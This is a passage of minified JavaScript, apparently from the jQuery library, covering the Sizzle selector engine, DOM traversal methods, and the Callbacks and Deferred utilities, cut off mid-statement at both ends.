t.parentNode.removeChild(t), t = null } } function fe(e, t) { for (var n = e.split("|"), i = n.length; i--;)r.attrHandle[n[i]] = t } function pe(e, t) { var n = t && e, r = n && 1 === e.nodeType && 1 === t.nodeType && e.sourceIndex - t.sourceIndex; if (r) return r; if (n) for (; n = n.nextSibling;)if (n === t) return -1; return e ? 1 : -1 } function de(e) { return function (t) { return "input" === t.nodeName.toLowerCase() && t.type === e } } function he(e) { return function (t) { var n = t.nodeName.toLowerCase(); return ("input" === n || "button" === n) && t.type === e } } function ge(e) { return function (t) { return "form" in t ? t.parentNode && !1 === t.disabled ? "label" in t ? "label" in t.parentNode ? t.parentNode.disabled === e : t.disabled === e : t.isDisabled === e || t.isDisabled !== !e && ae(t) === e : t.disabled === e : "label" in t && t.disabled === e } } function ve(e) { return le(function (t) { return t = +t, le(function (n, r) { for (var i, o = e([], n.length, t), a = o.length; a--;)n[i = o[a]] && (n[i] = !(r[i] = n[i])) }) }) } function ye(e) { return e && void 0 !== e.getElementsByTagName && e } for (t in n = se.support = {}, o = se.isXML = function (e) { var t = e && e.namespaceURI, n = e && (e.ownerDocument || e).documentElement; return !Y.test(t || n && n.nodeName || "HTML") }, p = se.setDocument = function (e) { var t, i, a = e ? e.ownerDocument || e : w; return a != d && 9 === a.nodeType && a.documentElement ? (h = (d = a).documentElement, g = !o(d), w != d && (i = d.defaultView) && i.top !== i && (i.addEventListener ? i.addEventListener("unload", oe, !1) : i.attachEvent && i.attachEvent("onunload", oe)), n.scope = ce(function (e) { return h.appendChild(e).appendChild(d.createElement("div")), void 0 !== e.querySelectorAll && !e.querySelectorAll(":scope fieldset div").length }), n.attributes = ce(function (e) { return e.className = "i", !e.getAttribute("className") }), n.getElementsByTagName = ce(function (e) { return e.appendChild(d.createComment("")), !e.getElementsByTagName("*").length }), n.getElementsByClassName = K.test(d.getElementsByClassName), n.getById = ce(function (e) { return h.appendChild(e).id = b, !d.getElementsByName || !d.getElementsByName(b).length }), n.getById ? (r.filter.ID = function (e) { var t = e.replace(te, ne); return function (e) { return e.getAttribute("id") === t } }, r.find.ID = function (e, t) { if (void 0 !== t.getElementById && g) { var n = t.getElementById(e); return n ? [n] : [] } }) : (r.filter.ID = function (e) { var t = e.replace(te, ne); return function (e) { var n = void 0 !== e.getAttributeNode && e.getAttributeNode("id"); return n && n.value === t } }, r.find.ID = function (e, t) { if (void 0 !== t.getElementById && g) { var n, r, i, o = t.getElementById(e); if (o) { if ((n = o.getAttributeNode("id")) && n.value === e) return [o]; for (i = t.getElementsByName(e), r = 0; o = i[r++];)if ((n = o.getAttributeNode("id")) && n.value === e) return [o] } return [] } }), r.find.TAG = n.getElementsByTagName ? function (e, t) { return void 0 !== t.getElementsByTagName ? t.getElementsByTagName(e) : n.qsa ? t.querySelectorAll(e) : void 0 } : function (e, t) { var n, r = [], i = 0, o = t.getElementsByTagName(e); if ("*" === e) { for (; n = o[i++];)1 === n.nodeType && r.push(n); return r } return o }, r.find.CLASS = n.getElementsByClassName && function (e, t) { if (void 0 !== t.getElementsByClassName && g) return t.getElementsByClassName(e) }, y = [], v = [], (n.qsa = K.test(d.querySelectorAll)) && (ce(function (e) { var t; h.appendChild(e).innerHTML = "<a id='" + b + "'></a><select id='" + b + "-\r\\' msallowcapture=''><option selected=''></option></select>", e.querySelectorAll("[msallowcapture^='']").length && v.push("[*^$]=" + R + "*(?:''|\"\")"), e.querySelectorAll("[selected]").length || v.push("\\[" + R + "*(?:value|" + P + ")"), e.querySelectorAll("[id~=" + b + "-]").length || v.push("~="), (t = d.createElement("input")).setAttribute("name", ""), e.appendChild(t), e.querySelectorAll("[name='']").length || v.push("\\[" + R + "*name" + R + "*=" + R + "*(?:''|\"\")"), e.querySelectorAll(":checked").length || v.push(":checked"), e.querySelectorAll("a#" + b + "+*").length || v.push(".#.+[+~]"), e.querySelectorAll("\\\f"), v.push("[\\r\\n\\f]") }), ce(function (e) { e.innerHTML = "<a href='' disabled='disabled'></a><select disabled='disabled'><option/></select>"; var t = d.createElement("input"); t.setAttribute("type", "hidden"), e.appendChild(t).setAttribute("name", "D"), e.querySelectorAll("[name=d]").length && v.push("name" + R + "*[*^$|!~]?="), 2 !== e.querySelectorAll(":enabled").length && v.push(":enabled", ":disabled"), h.appendChild(e).disabled = !0, 2 !== e.querySelectorAll(":disabled").length && v.push(":enabled", ":disabled"), e.querySelectorAll("*,:x"), v.push(",.*:") })), (n.matchesSelector = K.test(m = h.matches || h.webkitMatchesSelector || h.mozMatchesSelector || h.oMatchesSelector || h.msMatchesSelector)) && ce(function (e) { n.disconnectedMatch = m.call(e, "*"), m.call(e, "[s!='']:x"), y.push("!=", W) }), v = v.length && new RegExp(v.join("|")), y = y.length && new RegExp(y.join("|")), t = K.test(h.compareDocumentPosition), x = t || K.test(h.contains) ? function (e, t) { var n = 9 === e.nodeType ? e.documentElement : e, r = t && t.parentNode; return e === r || !(!r || 1 !== r.nodeType || !(n.contains ? n.contains(r) : e.compareDocumentPosition && 16 & e.compareDocumentPosition(r))) } : function (e, t) { if (t) for (; t = t.parentNode;)if (t === e) return !0; return !1 }, N = t ? function (e, t) { if (e === t) return f = !0, 0; var r = !e.compareDocumentPosition - !t.compareDocumentPosition; return r || (1 & (r = (e.ownerDocument || e) == (t.ownerDocument || t) ? e.compareDocumentPosition(t) : 1) || !n.sortDetached && t.compareDocumentPosition(e) === r ? e == d || e.ownerDocument == w && x(w, e) ? -1 : t == d || t.ownerDocument == w && x(w, t) ? 1 : c ? O(c, e) - O(c, t) : 0 : 4 & r ? -1 : 1) } : function (e, t) { if (e === t) return f = !0, 0; var n, r = 0, i = e.parentNode, o = t.parentNode, a = [e], s = [t]; if (!i || !o) return e == d ? -1 : t == d ? 1 : i ? -1 : o ? 1 : c ? O(c, e) - O(c, t) : 0; if (i === o) return pe(e, t); for (n = e; n = n.parentNode;)a.unshift(n); for (n = t; n = n.parentNode;)s.unshift(n); for (; a[r] === s[r];)r++; return r ? pe(a[r], s[r]) : a[r] == w ? -1 : s[r] == w ? 1 : 0 }, d) : d }, se.matches = function (e, t) { return se(e, null, null, t) }, se.matchesSelector = function (e, t) { if (p(e), n.matchesSelector && g && !k[t + " "] && (!y || !y.test(t)) && (!v || !v.test(t))) try { var r = m.call(e, t); if (r || n.disconnectedMatch || e.document && 11 !== e.document.nodeType) return r } catch (e) { k(t, !0) } return se(t, d, null, [e]).length > 0 }, se.contains = function (e, t) { return (e.ownerDocument || e) != d && p(e), x(e, t) }, se.attr = function (e, t) { (e.ownerDocument || e) != d && p(e); var i = r.attrHandle[t.toLowerCase()], o = i && j.call(r.attrHandle, t.toLowerCase()) ? i(e, t, !g) : void 0; return void 0 !== o ? o : n.attributes || !g ? e.getAttribute(t) : (o = e.getAttributeNode(t)) && o.specified ? o.value : null }, se.escape = function (e) { return (e + "").replace(re, ie) }, se.error = function (e) { throw new Error("Syntax error, unrecognized expression: " + e) }, se.uniqueSort = function (e) { var t, r = [], i = 0, o = 0; if (f = !n.detectDuplicates, c = !n.sortStable && e.slice(0), e.sort(N), f) { for (; t = e[o++];)t === e[o] && (i = r.push(o)); for (; i--;)e.splice(r[i], 1) } return c = null, e }, i = se.getText = function (e) { var t, n = "", r = 0, o = e.nodeType; if (o) { if (1 === o || 9 === o || 11 === o) { if ("string" == typeof e.textContent) return e.textContent; for (e = e.firstChild; e; e = e.nextSibling)n += i(e) } else if (3 === o || 4 === o) return e.nodeValue } else for (; t = e[r++];)n += i(t); return n }, (r = se.selectors = { cacheLength: 50, createPseudo: le, match: G, attrHandle: {}, find: {}, relative: { ">": { dir: "parentNode", first: !0 }, " ": { dir: "parentNode" }, "+": { dir: "previousSibling", first: !0 }, "~": { dir: "previousSibling" } }, preFilter: { ATTR: function (e) { return e[1] = e[1].replace(te, ne), e[3] = (e[3] || e[4] || e[5] || "").replace(te, ne), "~=" === e[2] && (e[3] = " " + e[3] + " "), e.slice(0, 4) }, CHILD: function (e) { return e[1] = e[1].toLowerCase(), "nth" === e[1].slice(0, 3) ? (e[3] || se.error(e[0]), e[4] = +(e[4] ? e[5] + (e[6] || 1) : 2 * ("even" === e[3] || "odd" === e[3])), e[5] = +(e[7] + e[8] || "odd" === e[3])) : e[3] && se.error(e[0]), e }, PSEUDO: function (e) { var t, n = !e[6] && e[2]; return G.CHILD.test(e[0]) ? null : (e[3] ? e[2] = e[4] || e[5] || "" : n && U.test(n) && (t = a(n, !0)) && (t = n.indexOf(")", n.length - t) - n.length) && (e[0] = e[0].slice(0, t), e[2] = n.slice(0, t)), e.slice(0, 3)) } }, filter: { TAG: function (e) { var t = e.replace(te, ne).toLowerCase(); return "*" === e ? function () { return !0 } : function (e) { return e.nodeName && e.nodeName.toLowerCase() === t } }, CLASS: function (e) { var t = E[e + " "]; return t || (t = new RegExp("(^|" + R + ")" + e + "(" + R + "|$)")) && E(e, function (e) { return t.test("string" == typeof e.className && e.className || void 0 !== e.getAttribute && e.getAttribute("class") || "") }) }, ATTR: function (e, t, n) { return function (r) { var i = se.attr(r, e); return null == i ? "!=" === t : !t || (i += "", "=" === t ? i === n : "!=" === t ? i !== n : "^=" === t ? n && 0 === i.indexOf(n) : "*=" === t ? n && i.indexOf(n) > -1 : "$=" === t ? n && i.slice(-n.length) === n : "~=" === t ? (" " + i.replace(F, " ") + " ").indexOf(n) > -1 : "|=" === t && (i === n || i.slice(0, n.length + 1) === n + "-")) } }, CHILD: function (e, t, n, r, i) { var o = "nth" !== e.slice(0, 3), a = "last" !== e.slice(-4), s = "of-type" === t; return 1 === r && 0 === i ? function (e) { return !!e.parentNode } : function (t, n, u) { var l, c, f, p, d, h, g = o !== a ? "nextSibling" : "previousSibling", v = t.parentNode, y = s && t.nodeName.toLowerCase(), m = !u && !s, x = !1; if (v) { if (o) { for (; g;) { for (p = t; p = p[g];)if (s ? p.nodeName.toLowerCase() === y : 1 === p.nodeType) return !1; h = g = "only" === e && !h && "nextSibling" } return !0 } if (h = [a ? v.firstChild : v.lastChild], a && m) { for (x = (d = (l = (c = (f = (p = v)[b] || (p[b] = {}))[p.uniqueID] || (f[p.uniqueID] = {}))[e] || [])[0] === T && l[1]) && l[2], p = d && v.childNodes[d]; p = ++d && p && p[g] || (x = d = 0) || h.pop();)if (1 === p.nodeType && ++x && p === t) { c[e] = [T, d, x]; break } } else if (m && (x = d = (l = (c = (f = (p = t)[b] || (p[b] = {}))[p.uniqueID] || (f[p.uniqueID] = {}))[e] || [])[0] === T && l[1]), !1 === x) for (; (p = ++d && p && p[g] || (x = d = 0) || h.pop()) && ((s ? p.nodeName.toLowerCase() !== y : 1 !== p.nodeType) || !++x || (m && ((c = (f = p[b] || (p[b] = {}))[p.uniqueID] || (f[p.uniqueID] = {}))[e] = [T, x]), p !== t));); return (x -= i) === r || x % r == 0 && x / r >= 0 } } }, PSEUDO: function (e, t) { var n, i = r.pseudos[e] || r.setFilters[e.toLowerCase()] || se.error("unsupported pseudo: " + e); return i[b] ? i(t) : i.length > 1 ? (n = [e, e, "", t], r.setFilters.hasOwnProperty(e.toLowerCase()) ? le(function (e, n) { for (var r, o = i(e, t), a = o.length; a--;)e[r = O(e, o[a])] = !(n[r] = o[a]) }) : function (e) { return i(e, 0, n) }) : i } }, pseudos: { not: le(function (e) { var t = [], n = [], r = s(e.replace($, "$1")); return r[b] ? le(function (e, t, n, i) { for (var o, a = r(e, null, i, []), s = e.length; s--;)(o = a[s]) && (e[s] = !(t[s] = o)) }) : function (e, i, o) { return t[0] = e, r(t, null, o, n), t[0] = null, !n.pop() } }), has: le(function (e) { return function (t) { return se(e, t).length > 0 } }), contains: le(function (e) { return e = e.replace(te, ne), function (t) { return (t.textContent || i(t)).indexOf(e) > -1 } }), lang: le(function (e) { return V.test(e || "") || se.error("unsupported lang: " + e), e = e.replace(te, ne).toLowerCase(), function (t) { var n; do { if (n = g ? t.lang : t.getAttribute("xml:lang") || t.getAttribute("lang")) return (n = n.toLowerCase()) === e || 0 === n.indexOf(e + "-") } while ((t = t.parentNode) && 1 === t.nodeType); return !1 } }), target: function (t) { var n = e.location && e.location.hash; return n && n.slice(1) === t.id }, root: function (e) { return e === h }, focus: function (e) { return e === d.activeElement && (!d.hasFocus || d.hasFocus()) && !!(e.type || e.href || ~e.tabIndex) }, enabled: ge(!1), disabled: ge(!0), checked: function (e) { var t = e.nodeName.toLowerCase(); return "input" === t && !!e.checked || "option" === t && !!e.selected }, selected: function (e) { return e.parentNode && e.parentNode.selectedIndex, !0 === e.selected }, empty: function (e) { for (e = e.firstChild; e; e = e.nextSibling)if (e.nodeType < 6) return !1; return !0 }, parent: function (e) { return !r.pseudos.empty(e) }, header: function (e) { return J.test(e.nodeName) }, input: function (e) { return Q.test(e.nodeName) }, button: function (e) { var t = e.nodeName.toLowerCase(); return "input" === t && "button" === e.type || "button" === t }, text: function (e) { var t; return "input" === e.nodeName.toLowerCase() && "text" === e.type && (null == (t = e.getAttribute("type")) || "text" === t.toLowerCase()) }, first: ve(function () { return [0] }), last: ve(function (e, t) { return [t - 1] }), eq: ve(function (e, t, n) { return [n < 0 ? n + t : n] }), even: ve(function (e, t) { for (var n = 0; n < t; n += 2)e.push(n); return e }), odd: ve(function (e, t) { for (var n = 1; n < t; n += 2)e.push(n); return e }), lt: ve(function (e, t, n) { for (var r = n < 0 ? n + t : n > t ? t : n; --r >= 0;)e.push(r); return e }), gt: ve(function (e, t, n) { for (var r = n < 0 ? n + t : n; ++r < t;)e.push(r); return e }) } }).pseudos.nth = r.pseudos.eq, { radio: !0, checkbox: !0, file: !0, password: !0, image: !0 }) r.pseudos[t] = de(t); for (t in { submit: !0, reset: !0 }) r.pseudos[t] = he(t); function me() { } function xe(e) { for (var t = 0, n = e.length, r = ""; t < n; t++)r += e[t].value; return r } function be(e, t, n) { var r = t.dir, i = t.next, o = i || r, a = n && "parentNode" === o, s = C++; return t.first ? function (t, n, i) { for (; t = t[r];)if (1 === t.nodeType || a) return e(t, n, i); return !1 } : function (t, n, u) { var l, c, f, p = [T, s]; if (u) { for (; t = t[r];)if ((1 === t.nodeType || a) && e(t, n, u)) return !0 } else for (; t = t[r];)if (1 === t.nodeType || a) if (c = (f = t[b] || (t[b] = {}))[t.uniqueID] || (f[t.uniqueID] = {}), i && i === t.nodeName.toLowerCase()) t = t[r] || t; else { if ((l = c[o]) && l[0] === T && l[1] === s) return p[2] = l[2]; if (c[o] = p, p[2] = e(t, n, u)) return !0 } return !1 } } function we(e) { return e.length > 1 ? function (t, n, r) { for (var i = e.length; i--;)if (!e[i](t, n, r)) return !1; return !0 } : e[0] } function Te(e, t, n, r, i) { for (var o, a = [], s = 0, u = e.length, l = null != t; s < u; s++)(o = e[s]) && (n && !n(o, r, i) || (a.push(o), l && t.push(s))); return a } function Ce(e, t, n, r, i, o) { return r && !r[b] && (r = Ce(r)), i && !i[b] && (i = Ce(i, o)), le(function (o, a, s, u) { var l, c, f, p = [], d = [], h = a.length, g = o || function (e, t, n) { for (var r = 0, i = t.length; r < i; r++)se(e, t[r], n); return n }(t || "*", s.nodeType ? [s] : s, []), v = !e || !o && t ? g : Te(g, p, e, s, u), y = n ? i || (o ? e : h || r) ? [] : a : v; if (n && n(v, y, s, u), r) for (l = Te(y, d), r(l, [], s, u), c = l.length; c--;)(f = l[c]) && (y[d[c]] = !(v[d[c]] = f)); if (o) { if (i || e) { if (i) { for (l = [], c = y.length; c--;)(f = y[c]) && l.push(v[c] = f); i(null, y = [], l, u) } for (c = y.length; c--;)(f = y[c]) && (l = i ? O(o, f) : p[c]) > -1 && (o[l] = !(a[l] = f)) } } else y = Te(y === a ? y.splice(h, y.length) : y), i ? i(null, a, y, u) : H.apply(a, y) }) } function Ee(e) { for (var t, n, i, o = e.length, a = r.relative[e[0].type], s = a || r.relative[" "], u = a ? 1 : 0, c = be(function (e) { return e === t }, s, !0), f = be(function (e) { return O(t, e) > -1 }, s, !0), p = [function (e, n, r) { var i = !a && (r || n !== l) || ((t = n).nodeType ? c(e, n, r) : f(e, n, r)); return t = null, i }]; u < o; u++)if (n = r.relative[e[u].type]) p = [be(we(p), n)]; else { if ((n = r.filter[e[u].type].apply(null, e[u].matches))[b]) { for (i = ++u; i < o && !r.relative[e[i].type]; i++); return Ce(u > 1 && we(p), u > 1 && xe(e.slice(0, u - 1).concat({ value: " " === e[u - 2].type ? "*" : "" })).replace($, "$1"), n, u < i && Ee(e.slice(u, i)), i < o && Ee(e = e.slice(i)), i < o && xe(e)) } p.push(n) } return we(p) } return me.prototype = r.filters = r.pseudos, r.setFilters = new me, a = se.tokenize = function (e, t) { var n, i, o, a, s, u, l, c = S[e + " "]; if (c) return t ? 0 : c.slice(0); for (s = e, u = [], l = r.preFilter; s;) { for (a in n && !(i = B.exec(s)) || (i && (s = s.slice(i[0].length) || s), u.push(o = [])), n = !1, (i = z.exec(s)) && (n = i.shift(), o.push({ value: n, type: i[0].replace($, " ") }), s = s.slice(n.length)), r.filter) !(i = G[a].exec(s)) || l[a] && !(i = l[a](i)) || (n = i.shift(), o.push({ value: n, type: a, matches: i }), s = s.slice(n.length)); if (!n) break } return t ? s.length : s ? se.error(e) : S(e, u).slice(0) }, s = se.compile = function (e, t) { var n, i = [], o = [], s = A[e + " "]; if (!s) { for (t || (t = a(e)), n = t.length; n--;)(s = Ee(t[n]))[b] ? i.push(s) : o.push(s); (s = A(e, function (e, t) { var n = t.length > 0, i = e.length > 0, o = function (o, a, s, u, c) { var f, h, v, y = 0, m = "0", x = o && [], b = [], w = l, C = o || i && r.find.TAG("*", c), E = T += null == w ? 1 : Math.random() || .1, S = C.length; for (c && (l = a == d || a || c); m !== S && null != (f = C[m]); m++) { if (i && f) { for (h = 0, a || f.ownerDocument == d || (p(f), s = !g); v = e[h++];)if (v(f, a || d, s)) { u.push(f); break } c && (T = E) } n && ((f = !v && f) && y--, o && x.push(f)) } if (y += m, n && m !== y) { for (h = 0; v = t[h++];)v(x, b, a, s); if (o) { if (y > 0) for (; m--;)x[m] || b[m] || (b[m] = q.call(u)); b = Te(b) } H.apply(u, b), c && !o && b.length > 0 && y + t.length > 1 && se.uniqueSort(u) } return c && (T = E, l = w), x }; return n ? le(o) : o }(o, i))).selector = e } return s }, u = se.select = function (e, t, n, i) { var o, u, l, c, f, p = "function" == typeof e && e, d = !i && a(e = p.selector || e); if (n = n || [], 1 === d.length) { if ((u = d[0] = d[0].slice(0)).length > 2 && "ID" === (l = u[0]).type && 9 === t.nodeType && g && r.relative[u[1].type]) { if (!(t = (r.find.ID(l.matches[0].replace(te, ne), t) || [])[0])) return n; p && (t = t.parentNode), e = e.slice(u.shift().value.length) } for (o = G.needsContext.test(e) ? 0 : u.length; o-- && (l = u[o], !r.relative[c = l.type]);)if ((f = r.find[c]) && (i = f(l.matches[0].replace(te, ne), ee.test(u[0].type) && ye(t.parentNode) || t))) { if (u.splice(o, 1), !(e = i.length && xe(u))) return H.apply(n, i), n; break } } return (p || s(e, d))(i, t, !g, n, !t || ee.test(e) && ye(t.parentNode) || t), n }, n.sortStable = b.split("").sort(N).join("") === b, n.detectDuplicates = !!f, p(), n.sortDetached = ce(function (e) { return 1 & e.compareDocumentPosition(d.createElement("fieldset")) }), ce(function (e) { return e.innerHTML = "<a href='#'></a>", "#" === e.firstChild.getAttribute("href") }) || fe("type|href|height|width", function (e, t, n) { if (!n) return e.getAttribute(t, "type" === t.toLowerCase() ? 1 : 2) }), n.attributes && ce(function (e) { return e.innerHTML = "<input/>", e.firstChild.setAttribute("value", ""), "" === e.firstChild.getAttribute("value") }) || fe("value", function (e, t, n) { if (!n && "input" === e.nodeName.toLowerCase()) return e.defaultValue }), ce(function (e) { return null == e.getAttribute("disabled") }) || fe(P, function (e, t, n) { var r; if (!n) return !0 === e[t] ? t.toLowerCase() : (r = e.getAttributeNode(t)) && r.specified ? r.value : null }), se }(e); b.find = T, b.expr = T.selectors, b.expr[":"] = b.expr.pseudos, b.uniqueSort = b.unique = T.uniqueSort, b.text = T.getText, b.isXMLDoc = T.isXML, b.contains = T.contains, b.escapeSelector = T.escape; var C = function (e, t, n) { for (var r = [], i = void 0 !== n; (e = e[t]) && 9 !== e.nodeType;)if (1 === e.nodeType) { if (i && b(e).is(n)) break; r.push(e) } return r }, E = function (e, t) { for (var n = []; e; e = e.nextSibling)1 === e.nodeType && e !== t && n.push(e); return n }, S = b.expr.match.needsContext; function A(e, t) { return e.nodeName && e.nodeName.toLowerCase() === t.toLowerCase() } var k = /^<([a-z][^\/\0>:\x20\t\r\n\f]*)[\x20\t\r\n\f]*\/?>(?:<\/\1>|)$/i; function N(e, t, n) { return h(t) ? b.grep(e, function (e, r) { return !!t.call(e, r, e) !== n }) : t.nodeType ? b.grep(e, function (e) { return e === t !== n }) : "string" != typeof t ? b.grep(e, function (e) { return s.call(t, e) > -1 !== n }) : b.filter(t, e, n) } b.filter = function (e, t, n) { var r = t[0]; return n && (e = ":not(" + e + ")"), 1 === t.length && 1 === r.nodeType ? b.find.matchesSelector(r, e) ? [r] : [] : b.find.matches(e, b.grep(t, function (e) { return 1 === e.nodeType })) }, b.fn.extend({ find: function (e) { var t, n, r = this.length, i = this; if ("string" != typeof e) return this.pushStack(b(e).filter(function () { for (t = 0; t < r; t++)if (b.contains(i[t], this)) return !0 })); for (n = this.pushStack([]), t = 0; t < r; t++)b.find(e, i[t], n); return r > 1 ? b.uniqueSort(n) : n }, filter: function (e) { return this.pushStack(N(this, e || [], !1)) }, not: function (e) { return this.pushStack(N(this, e || [], !0)) }, is: function (e) { return !!N(this, "string" == typeof e && S.test(e) ? b(e) : e || [], !1).length } }); var j, D = /^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]+))$/; (b.fn.init = function (e, t, n) { var r, i; if (!e) return this; if (n = n || j, "string" == typeof e) { if (!(r = "<" === e[0] && ">" === e[e.length - 1] && e.length >= 3 ? [null, e, null] : D.exec(e)) || !r[1] && t) return !t || t.jquery ? (t || n).find(e) : this.constructor(t).find(e); if (r[1]) { if (t = t instanceof b ? t[0] : t, b.merge(this, b.parseHTML(r[1], t && t.nodeType ? t.ownerDocument || t : v, !0)), k.test(r[1]) && b.isPlainObject(t)) for (r in t) h(this[r]) ? this[r](t[r]) : this.attr(r, t[r]); return this } return (i = v.getElementById(r[2])) && (this[0] = i, this.length = 1), this } return e.nodeType ? (this[0] = e, this.length = 1, this) : h(e) ? void 0 !== n.ready ? n.ready(e) : e(b) : b.makeArray(e, this) }).prototype = b.fn, j = b(v); var q = /^(?:parents|prev(?:Until|All))/, L = { children: !0, contents: !0, next: !0, prev: !0 }; function H(e, t) { for (; (e = e[t]) && 1 !== e.nodeType;); return e } b.fn.extend({ has: function (e) { var t = b(e, this), n = t.length; return this.filter(function () { for (var e = 0; e < n; e++)if (b.contains(this, t[e])) return !0 }) }, closest: function (e, t) { var n, r = 0, i = this.length, o = [], a = "string" != typeof e && b(e); if (!S.test(e)) for (; r < i; r++)for (n = this[r]; n && n !== t; n = n.parentNode)if (n.nodeType < 11 && (a ? a.index(n) > -1 : 1 === n.nodeType && b.find.matchesSelector(n, e))) { o.push(n); break } return this.pushStack(o.length > 1 ? b.uniqueSort(o) : o) }, index: function (e) { return e ? "string" == typeof e ? s.call(b(e), this[0]) : s.call(this, e.jquery ? e[0] : e) : this[0] && this[0].parentNode ? this.first().prevAll().length : -1 }, add: function (e, t) { return this.pushStack(b.uniqueSort(b.merge(this.get(), b(e, t)))) }, addBack: function (e) { return this.add(null == e ? this.prevObject : this.prevObject.filter(e)) } }), b.each({ parent: function (e) { var t = e.parentNode; return t && 11 !== t.nodeType ? t : null }, parents: function (e) { return C(e, "parentNode") }, parentsUntil: function (e, t, n) { return C(e, "parentNode", n) }, next: function (e) { return H(e, "nextSibling") }, prev: function (e) { return H(e, "previousSibling") }, nextAll: function (e) { return C(e, "nextSibling") }, prevAll: function (e) { return C(e, "previousSibling") }, nextUntil: function (e, t, n) { return C(e, "nextSibling", n) }, prevUntil: function (e, t, n) { return C(e, "previousSibling", n) }, siblings: function (e) { return E((e.parentNode || {}).firstChild, e) }, children: function (e) { return E(e.firstChild) }, contents: function (e) { return null != e.contentDocument && r(e.contentDocument) ? e.contentDocument : (A(e, "template") && (e = e.content || e), b.merge([], e.childNodes)) } }, function (e, t) { b.fn[e] = function (n, r) { var i = b.map(this, t, n); return "Until" !== e.slice(-5) && (r = n), r && "string" == typeof r && (i = b.filter(r, i)), this.length > 1 && (L[e] || b.uniqueSort(i), q.test(e) && i.reverse()), this.pushStack(i) } }); var _ = /[^\x20\t\r\n\f]+/g; function O(e) { return e } function P(e) { throw e } function R(e, t, n, r) { var i; try { e && h(i = e.promise) ? i.call(e).done(t).fail(n) : e && h(i = e.then) ? i.call(e, t, n) : t.apply(void 0, [e].slice(r)) } catch (e) { n.apply(void 0, [e]) } } b.Callbacks = function (e) { e = "string" == typeof e ? function (e) { var t = {}; return b.each(e.match(_) || [], function (e, n) { t[n] = !0 }), t }(e) : b.extend({}, e); var t, n, r, i, o = [], a = [], s = -1, u = function () { for (i = i || e.once, r = t = !0; a.length; s = -1)for (n = a.shift(); ++s < o.length;)!1 === o[s].apply(n[0], n[1]) && e.stopOnFalse && (s = o.length, n = !1); e.memory || (n = !1), t = !1, i && (o = n ? [] : "") }, l = { add: function () { return o && (n && !t && (s = o.length - 1, a.push(n)), function t(n) { b.each(n, function (n, r) { h(r) ? e.unique && l.has(r) || o.push(r) : r && r.length && "string" !== x(r) && t(r) }) }(arguments), n && !t && u()), this }, remove: function () { return b.each(arguments, function (e, t) { for (var n; (n = b.inArray(t, o, n)) > -1;)o.splice(n, 1), n <= s && s-- }), this }, has: function (e) { return e ? b.inArray(e, o) > -1 : o.length > 0 }, empty: function () { return o && (o = []), this }, disable: function () { return i = a = [], o = n = "", this }, disabled: function () { return !o }, lock: function () { return i = a = [], n || t || (o = n = ""), this }, locked: function () { return !!i }, fireWith: function (e, n) { return i || (n = [e, (n = n || []).slice ? n.slice() : n], a.push(n), t || u()), this }, fire: function () { return l.fireWith(this, arguments), this }, fired: function () { return !!r } }; return l }, b.extend({ Deferred: function (t) { var n = [["notify", "progress", b.Callbacks("memory"), b.Callbacks("memory"), 2], ["resolve", "done", b.Callbacks("once memory"), b.Callbacks("once memory"), 0, "resolved"], ["reject", "fail", b.Callbacks("once memory"), b.Callbacks("once memory"), 1, "rejected"]], r = "pending", i = { state: function () { return r }, always: function () { return o.done(arguments).fail(arguments), this }, catch: function (e) { return i.then(null, e) }, pipe: function () { var e = arguments; return b.Deferred(function (t) { b.each(n, function (n, r) { var i = h(e[r[4]]) && e[r[4]]; o[r[1]](function () { var e = i && i.apply(this, arguments); e && h(e.promise) ? e.promise().progress(t.notify).done(t.resolve).fail(t.reject) : t[r[0] + "With"](this, i ? [e] : arguments) }) }), e = null }).promise() }, then: function (t, r, i) { var o = 0; function a(t, n, r, i) { return function () { var s = this, u = arguments, l = function () { var e, l; if (!(t < o)) { if ((e = r.apply(s, u)) === n.promise()) throw new TypeError("Thenable self-resolution"); l = e && ("object" == typeof e || "function" == typeof e) && e.then, h(l) ? i ? l.call(e, a(o, n, O, i), a(o, n, P, i)) : (o++, l.call(e, a(o, n, O, i), a(o, n, P, i), a(o, n, O, n.notifyWith))) : (r !== O && (s = void 0, u = [e]), (i || n.resolveWith)(s, u)) } }, c = i ? l : function () { try { l() } catch (e) { b.Deferred.exceptionHook && b.Deferred.exceptionHook(e, c.stackTrace), t + 1 >= o && (r !== P && (s = void 0, u = [e]), n.rejectWith(s, u)) } }; t ? c() : (b.Deferred.getStackHook && (c.stackTrace = b.Deferred.getStackHook()), e.setTimeout(c)) } } return b.Deferred(function (e) { n[0][3].add(a(0, e, h(i) ? i : O, e.notifyWith)), n[1][3].add(a(0, e, h(t) ? t : O)), n[2][3].add(a(0, e, h(r) ? r : P)) }).promise() }, promise: function (e) { return null != e ? b.extend(e, i) : i } }, o = {}; return b.each(n, function (e, t) { var a = t[2], s = t[5]; i[t[1]] = a.add, s && a.add(function () { r = s }, n[3 - e][2].disable, n[3 - e][3].disable, n[0][2].lock, n[0][3].lock), a.add(t[3].fire), o[t[0]] = function () { return o[t[0] + "With"](this === o ? void 0 : this, arguments), this }, o[t[0] + "With"] = a.fireWith }), i.promise(o), t && t.call(o, o), o }, when: function (e) { var t = arguments.length, n = t, r = Array(n), o = i.call(arguments), a = b.Deferred(), s = function (e) { return function (n) { r[e] = this, o[e] = arguments.length > 1 ? i.call(arguments) : n, --t || a.resolveWith(r, o) } }; if (t <= 1 && (R(e, a.done(s(n)).resolve, a.reject, !t), "pending" === a.state() || h(o[n] && o[n].then))) return a.then(); for (; n--;)R(o[n], s(n), a.reject); return a.promise() } }); var M = /^(Eval|Internal|Range|Reference|Syntax|Type|URI)Error$/; b.Deferred.exceptionHook = function (t, n) { e.console && e.console.warn && t && M.test(t.name) && e.console.warn("jQuery.Deferred exception: " + t.message, t.stack, n) }, b.readyException = function (t) { e.setTimeout(function () { throw t }) }; var I = b.Deferred(); function W() { v.removeEventListener("DOMContentLoaded", W), e.removeEventListener("load", W), b.ready() } b.fn.ready = function (e) { return I.then(e).catch(function (e) { b.readyException(e) }), this }, b.extend({ isReady: !1, readyWait: 1, ready: function (e) { (!0 === e ? --b.readyWait : b.isReady) || (b.isReady = !0, !0 !== e && --b.readyWait > 0 || I.resolveWith(v, [b])) } }), b.ready.then = I.then, "complete" === v.readyState || "loading" !== v.readyState && !v.documentElement.doScroll ? e.setTimeout(b.ready) : (v.addEventListener("DOMContentLoaded", W), e.addEventListener("load", W)); var F = function (e, t, n, r, i, o, a) { var s = 0, u = e.length, l = null == n; if ("object" === x(n)) for (s in i = !0, n) F(e, t, s, n[s], !0, o, a); else if (void 0 !== r && (i = !0, 